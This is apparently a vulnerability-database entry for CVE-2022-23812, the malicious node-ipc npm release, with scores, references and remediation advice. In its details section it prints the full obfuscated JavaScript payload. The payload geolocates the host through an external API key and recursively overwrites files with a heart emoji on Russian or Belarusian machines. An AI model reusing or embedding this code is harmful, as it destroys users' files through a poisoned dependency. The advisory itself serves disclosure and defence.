CVE-2022-23812
Published: 16 March 2022
Summary
CVE-2022-23812 is a critical-severity an unspecified weakness vulnerability in Node-Ipc Project Node-Ipc. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 7.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
CVE-2022-23812 is a supply-chain compromise in the node-ipc npm package affecting versions 10.1.1 through 10.1.2. The package contains embedded malicious code that uses an external geolocation API to identify installations whose IP addresses are located in Russia or Belarus and then recursively overwrites matching files in the current working directory and its parents with a heart-emoji byte sequence. Later releases beginning with 11.0.0 no longer embed the logic directly but instead import the separate peacenotwar package that exhibits similar undesired behavior.
Any developer or automated build process that installs or executes the affected package versions can trigger the payload without authentication or user interaction. When the geolocation check succeeds, the code silently replaces file contents, resulting in loss of integrity and availability for any files whose paths match the traversed directories.
Public references, including the NetApp advisory NTAP-20220407-0005 and the node-ipc GitHub commit history, indicate that users should avoid the listed vulnerable releases and migrate to a version that does not import peacenotwar or the original malicious logic. The package repository issues further document removal of the geo-targeted overwrite routine.
EPSS scores for the CVE reached a peak of 0.1738 before receding to the current value of 0.0830; no material post-disclosure climb from a documented low baseline is shown in the available data.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-1390
Vulnerability details
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of…
more
having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.